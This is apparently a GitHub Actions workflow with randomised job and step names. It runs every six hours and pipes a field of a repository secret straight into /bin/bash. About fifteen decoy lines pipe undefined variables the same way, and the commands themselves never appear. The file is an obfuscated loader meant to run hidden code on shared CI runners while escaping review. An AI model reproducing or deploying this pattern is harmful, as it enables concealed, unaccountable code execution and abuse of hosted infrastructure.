name: xiaoshouya4617

on:
  workflow_dispatch:
  schedule:
    - cron: '41 0/6 * * *'

jobs:  # 28958
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaoshouya4617
        env:
          n3: ${{ secrets.n3 }}
        run: |
          echo $n3 | jq -r .bmnk8730 | /bin/bash
          echo $wfy03586 | jq -r .mv8213 | /bin/bash
          echo $bn36562 | jq -r .uhp1453 | /bin/bash
          echo $qbuuc886 | jq -r .hkge8 | /bin/bash
          echo $syuex795 | jq -r .jqb35547 | /bin/bash
          echo $hqjer21214 | jq -r .ihdg992 | /bin/bash
          echo $v828 | jq -r .eqvs7126 | /bin/bash
          echo $u8560 | jq -r .zoft7297 | /bin/bash
          echo $uef84 | jq -r .sfk934 | /bin/bash
          echo $y615 | jq -r .nz5762 | /bin/bash
          echo $k05 | jq -r .rpcci90629 | /bin/bash
          echo $d4869 | jq -r .zzky19 | /bin/bash
          echo $fjl1 | jq -r .nshi17 | /bin/bash
          echo $k2051 | jq -r .uyu95700 | /bin/bash
          echo $zwcpj67473 | jq -r .lozrk6344 | /bin/bash
          echo $mcl7 | jq -r .gm78 | /bin/bash

